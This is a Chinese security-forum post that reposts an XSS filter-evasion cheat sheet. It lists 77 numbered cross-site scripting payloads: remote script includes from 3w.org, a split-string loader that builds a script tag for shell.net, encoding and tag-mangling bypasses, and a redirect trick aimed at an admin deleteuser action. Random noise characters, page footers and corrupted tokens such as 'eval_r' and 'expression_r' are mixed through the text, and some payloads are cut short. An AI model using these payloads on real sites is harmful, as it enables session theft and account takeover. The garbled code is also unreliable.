貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。! o; r' {% e$ ?
(1)普通的XSS JavaScript注入
: _" D0 B1 U9 J9 r$ F+ {<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& ?! F# q% j& n4 x1 ?0 b0 o( f& y; {(2)IMG标签XSS使用JavaScript命令$ j5 c6 B. _+ j
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) y: c1 S5 z# ^(3)IMG标签无分号无引号
2 E; A( @. m, [* z( x3 Z( g8 x<IMG SRC=javascript:alert(‘XSS’)>$ g4 W6 ]& L. j) U: J
(4)IMG标签大小写不敏感
: O3 [; ]# c1 w4 U. M<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
4 k8 v' [- `4 \(5)HTML编码(必须有分号). K$ E* _; ~9 f$ ~8 R; K, S+ u
<IMG SRC=javascript:alert(“XSS”)>; t0 d7 P7 Y) @- h7 ?$ y
(6)修正缺陷IMG标签: F' z" C0 D3 C% E; p% i
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>. T/ T( D8 R* w
c5 T$ j' H1 \2 G2 i
8 i( r, K8 i) {( ?8 T(7)formCharCode标签(计算器): D. P% Q) |- m V5 F4 ^1 \: e
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
9 G V. Q! e% J(8)UTF-8的Unicode编码(计算器)
. [: b8 O) a& C8 H1 \& n<IMG SRC=jav..省略..S')>
% F5 u+ ^# u* G# j3 v1 e(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
7 E; i7 h* C# [% s3 G( a }<IMG SRC=jav..省略..S')>
/ X8 |& E9 ~% s; J9 o# E(10)十六进制编码也是没有分号(计算器)
3 J. ]! ?5 O9 d3 L5 U1 ?2 [5 Y<IMG SRC=java..省略..XSS')># s9 ]6 d) ^9 H' P; i3 F! L* a3 v# z
(11)嵌入式标签,将Javascript分开7 N' P/ Q" M% V" O
<IMG SRC=”jav ascript:alert(‘XSS’);”>$ K" Q4 {6 d9 ]7 v6 i1 ?. R" k
(12)嵌入式编码标签,将Javascript分开1 c2 f9 } C8 M) c% k) ? V: Q3 _
<IMG SRC=”jav ascript:alert(‘XSS’);”>' V7 o4 K3 Q- e, z2 w: H: _" p
(13)嵌入式换行符
8 d) v+ c" |# {: z' S$ V- }) Z<IMG SRC=”jav ascript:alert(‘XSS’);”>5 P. N% x2 ^. u2 j6 B
(14)嵌入式回车
* y$ D. ]5 |# U& F' P, N) l2 F<IMG SRC=”jav ascript:alert(‘XSS’);”>8 j |0 }% d; a* v, q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子& L) E1 ^1 h0 R' W& g
<IMG SRC=”javascript:alert(‘XSS‘)”>
, H0 V( Z, y* Z- l* n* J: @" l(16)解决限制字符(要求同页面)
4 Y" w) K* q5 w8 |1 V<script>z=’document.’</script>
& P3 c) } Z. q. {2 x# c+ H<script>z=z+’write(“‘</script>9 O" U n$ s$ E* X: p0 _
<script>z=z+’<script’</script>* [3 v) B4 _, B3 T" `' H
<script>z=z+’ src=ht’</script>3 t! a7 m- y) H0 [- k
<script>z=z+’tp://ww’</script>6 a6 Q' v0 y5 r0 p! |6 J
<script>z=z+’w.shell’</script>$ ^5 Y2 K* h+ e/ H- z) T- R5 U! g0 W3 s
<script>z=z+’.net/1.’</script>
7 O4 T: P% T L) h2 n% Z<script>z=z+’js></sc’</script>
' ]1 q9 h/ Y' R' l" ]( V c<script>z=z+’ript>”)’</script>9 s/ `! }3 F8 T3 g& s8 H
<script>eval_r(z)</script>
0 B0 u) ~) h* g(17)空字符12-7-1 T00LS - Powered by Discuz! Board$ u. x% N' B1 H' N3 Y
https://www.t00ls.net/viewthread ... table&tid=15267 2/6 Y( [3 S' O) L
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 U* L1 R/ w8 s, l% l
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
8 X# [, s$ d( J8 a. uperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# N9 `' i: _* B2 F$ r" Y# f0 l
(19)Spaces和meta前的IMG标签
7 `* Y7 o' n$ P8 e<IMG SRC=” javascript:alert(‘XSS’);”>
- C% t) O- ^; I) w5 L1 E5 _% w0 Z(20)Non-alpha-non-digit XSS& O" u) j# _& o8 |$ V
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>. C6 }% B- F2 G7 e
(21)Non-alpha-non-digit XSS to 2
0 g- L& o% m0 n1 z/ F9 `<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
3 t- E; B$ r# W& a( }. V& \(22)Non-alpha-non-digit XSS to 3
. I. H6 W7 }7 A/ y. J! ~" L<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
8 X7 ~1 K7 J3 F(23)双开括号, d( H7 u4 w8 w0 N- s' G+ `4 ~
<<SCRIPT>alert(“XSS”);//<</SCRIPT>/ M1 n+ X* Y& t: N2 _
(24)无结束脚本标记(仅火狐等浏览器)) ^% }3 B ], w9 a9 I
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>+ f+ P! p+ D- `% M# ~
(25)无结束脚本标记2
7 i8 P' C$ s( c" {/ L& W<SCRIPT SRC=//3w.org/XSS/xss.js>
+ x8 g3 E2 V# Z- E$ k! @(26)半开的HTML/JavaScript XSS
1 w$ v( u' d- n9 M6 P<IMG SRC=”javascript:alert(‘XSS’)”
! F3 u" M9 U3 J4 H(27)双开角括号
( G- b: J& O. [% I<iframe src=http://3w.org/XSS.html <
/ r: b) c8 Y# j- W(28)无单引号 双引号 分号
: x: Z; v- b; }, N<SCRIPT>a=/XSS/1 l T" K, b" T P8 g$ |
alert(a.source)</SCRIPT>
5 Z% [- H6 b( c, [(29)换码过滤的JavaScript
* G' Q* P3 K2 o7 l6 u: [\”;alert(‘XSS’);//
3 P' r. e6 D9 N( s3 J. [(30)结束Title标签0 v8 g* [/ z a1 S B5 \0 ~; a
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
5 p# s; K* F! S8 g/ Y0 [7 j(31)Input Image% T* j3 b& H5 B+ S
<INPUT SRC=”javascript:alert(‘XSS’);”>2 ?) ?# d6 y d" B
(32)BODY Image8 S& W8 A5 r+ X0 V7 N! I9 X# F
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
5 X3 o E! ]: d3 I6 E(33)BODY标签% w U) L6 K d: M- O v! I
<BODY(‘XSS’)>2 ^( ^" V6 x ~- C
(34)IMG Dynsrc
! B* |/ y* o! B4 P& v+ V<IMG DYNSRC=”javascript:alert(‘XSS’)”>
* U( D" q7 S3 Z! o5 Y(35)IMG Lowsrc
( v; f) e9 c0 m/ s<IMG LOWSRC=”javascript:alert(‘XSS’)”>, D8 }1 `, t$ `, S1 B- w/ b0 c
(36)BGSOUND
: Z( K0 z$ |% F. V; Y* b$ }- k0 ^1 m<BGSOUND SRC=”javascript:alert(‘XSS’);”>
6 R: F* X$ D- x7 F n: R# Y6 u(37)STYLE sheet
) c, t, V( A0 c) Y2 `4 W6 ]<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
4 z/ c) Z: }5 F2 Y(38)远程样式表) W' F, {( Q: z1 u
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
0 f" O7 I4 E+ ?. i' U/ n m(39)List-style-image(列表式)6 v8 h O- f( ^* d0 ^& x f3 i
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
% z6 L6 ]; F. W* |5 \9 g' H(40)IMG VBscript# K: ]+ X' l F/ \' u5 P
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
& R+ e8 P+ b6 L; e: ?* \(41)META链接url2 `1 v2 [1 |9 z6 B) ^7 N% G
8 x% f& a# X, y) K Z; c! J" Z) B: A3 _. T, B7 P s% F! `
<META HTTP-EQUIV=”refresh” CONTENT=”0;3 e% K' P7 P1 f8 @" I0 ]' N% |
URL=http://;URL=javascript:alert(‘XSS’);”>; n% Q6 e7 {5 u; _2 i
(42)Iframe2 A5 Y" k; c: V, O1 s' z6 E
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>- b5 ]! R' [4 C
(43)Frame
% m6 B9 f# w; a/ q j<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board, F9 i/ _6 T" u- ?( |- R
https://www.t00ls.net/viewthread ... table&tid=15267 3/65 W' I' Q/ x3 y$ X
(44)Table( F, ^: @9 d# o! J) e6 J. R
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>! z3 }/ `. B6 |* s/ d+ Q D
(45)TD. P! }- A$ C _8 ^5 @9 R4 m
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
8 ]. w) T3 p% p, v& _(46)DIV background-image) t& q1 g! g7 N( Y+ F9 P) n
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>: X# X! `5 P; `/ p
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
& z, |" P( ]# v r3 o! \8&13&12288&65279)
; O& c/ n2 h3 e9 y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>1 f4 f! k# T5 W! X$ j
(48)DIV expression
0 k" g8 A1 D, |. ?<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
* }( n# x# D4 P$ O(49)STYLE属性分拆表达; z- |, h b9 ~. x5 L$ {
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>) t& [% i$ ^- h' z/ |
(50)匿名STYLE(组成:开角号和一个字母开头)
" [2 t* H7 }8 I E7 k<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
: [) E! z$ J! p& N7 r7 {(51)STYLE background-image" ?* g: z* p. o1 \$ q
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A$ F4 n8 I6 }8 a0 Q' F7 k: b
CLASS=XSS></A>: h1 ~0 [7 w, O
(52)IMG STYLE方式
$ H& W3 N4 G& Q% F8 c1 i/ |exppression(alert(“XSS”))’>; K2 u5 V" {! c
(53)STYLE background
+ J; h- E/ e) S+ ]# d9 J<STYLE><STYLE
) ~ @& m: R$ d( ?2 _type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- f; S: j0 s+ f/ [9 h, _(54)BASE. X% r4 V8 U4 `9 j* _9 D
<BASE HREF=”javascript:alert(‘XSS’);//”>
l$ u' i3 \8 B(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS2 `2 i5 U% s0 F8 a" j" e. R* b
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>3 P/ o8 h H" n# G W
(56)在flash中使用ActionScrpt可以混进你XSS的代码
7 g) [& d5 d M5 f" va=”get”;/ O9 y9 }! V( m* S0 ]0 ^
b=”URL(\”";) a! Z/ F# \. |4 \) a
c=”javascript:”;
/ r( h) I4 a+ \. I0 a' Gd=”alert(‘XSS’);\”)”;
9 n" G8 I/ u4 q Heval_r(a+b+c+d);& G4 ?" k2 i& b& m9 L$ X
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
6 f% d* x! `0 o5 h$ G5 P3 w7 u<HTML xmlns:xss>
7 R( E6 t S1 W9 H) b# v<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
' \, U+ i# J4 ]2 Z/ N/ S<xss:xss>XSS</xss:xss>
7 J& p, o' k: q( n% |. Y# D</HTML>
6 r; U, ]+ q7 e" f' A" ~(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
7 q% }/ G! Q; [3 l* w! W, B<SCRIPT SRC=””></SCRIPT>0 g6 A$ G6 U+ p1 m+ D0 D
(59)IMG嵌入式命令,可执行任意命令3 c% T9 G0 J" O2 Y, a0 X
<IMG SRC=”http://www.XXX.com/a.php?a=b”>8 x! Y1 c' l& P. n% a
(60)IMG嵌入式命令(a.jpg在同服务器)
5 |1 g. E$ `, F! d4 F; J! }Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser/ Y4 @' F* J6 a: l# C: ~( L( m
(61)绕符号过滤
* O. e1 G9 f4 _0 \$ G$ V<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' X y7 b+ G1 I1 Y(62)# ^) U1 t1 n$ h& u2 K: j h5 Y
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. ~8 w: d/ y, s8 h% l$ _6 v(63) K3 D& ~3 G( ~$ ^4 C- n" K
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
1 n& C; S- A! F# E4 A9 y- b/ j(64)
% J; _9 ~& B0 `9 x<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>7 Q; V, m( S& \" I1 ^. p% P, H
(65)) v \' K: U7 ^
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>: h8 y2 }" y4 g* m4 s% _% N
(66)12-7-1 T00LS - Powered by Discuz! Board
5 C, a+ T: z1 w4 lhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6 C2 }: m2 K2 n! l9 u1 b* K
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>& }: m2 j* Q6 H
(67)4 [ ~, Z7 @. r+ z9 Y
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”> H0 g- U* M; T8 x4 J: B
</SCRIPT>
3 W4 _0 `$ f+ _- r0 b/ [' ]$ N6 l(68)URL绕行
- p" T9 h- [) s" A* u, i9 @; \7 q<A HREF=”http://127.0.0.1/”>XSS</A>
- c, P' a, I8 A6 z, {7 T(69)URL编码* {! b( \" f( g& F% _' \
<A HREF=”http://3w.org”>XSS</A>9 s0 r) y8 z* r/ U. d% Z7 ~0 ?2 n, o
(70)IP十进制
$ ?2 A) j# k$ S5 J<A HREF=”http://3232235521″>XSS</A>0 f7 c+ Q2 }' i, i1 B$ @) X/ f; |: w
(71)IP十六进制
& P( e' Z; m* P- q; M<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
7 `+ k' f# s+ a$ E( a(72)IP八进制5 `7 E' l# {9 C. v5 N4 `0 K
<A HREF=”http://0300.0250.0000.0001″>XSS</A>/ ~5 e$ {# V. d& S% V
(73)混合编码- J3 w- p/ e$ |
<A HREF=”h$ {0 A# O( ]. P0 v/ A
tt p://6 6.000146.0×7.147/”">XSS</A>
0 q, Q9 i" j8 {3 _: v(74)节省[http:]0 Q# o# j+ H8 J2 ~9 |5 D" k
<A HREF=”//www.google.com/”>XSS</A>$ |1 a; ~0 t3 n
(75)节省[www]
+ m+ |8 B' S$ J, S6 m3 Z. \2 ]) i<A HREF=”http://google.com/”>XSS</A>( U1 ~0 z; Q& e6 e
(76)绝对点绝对DNS
2 L! c7 V) j j6 F" }<A HREF=”http://www.google.com./”>XSS</A>
' S+ N C: l' o/ e(77)javascript链接7 }% i5 m$ D5 M0 K8 p/ X% }% l
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>+ g! I: M0 r. G; o
7 O9 J+ v) s; s6 H$ E! o( @原文地址:http://fuzzexp.org/u/0day/?p=14
* E) J0 n; x! ?, s- f5 \, A, s9 V4 p
0 ]% V. P) z; R3 Z8 ^0 S" d |
发表于 2013-4-19 19:22:37
收藏
支持
反对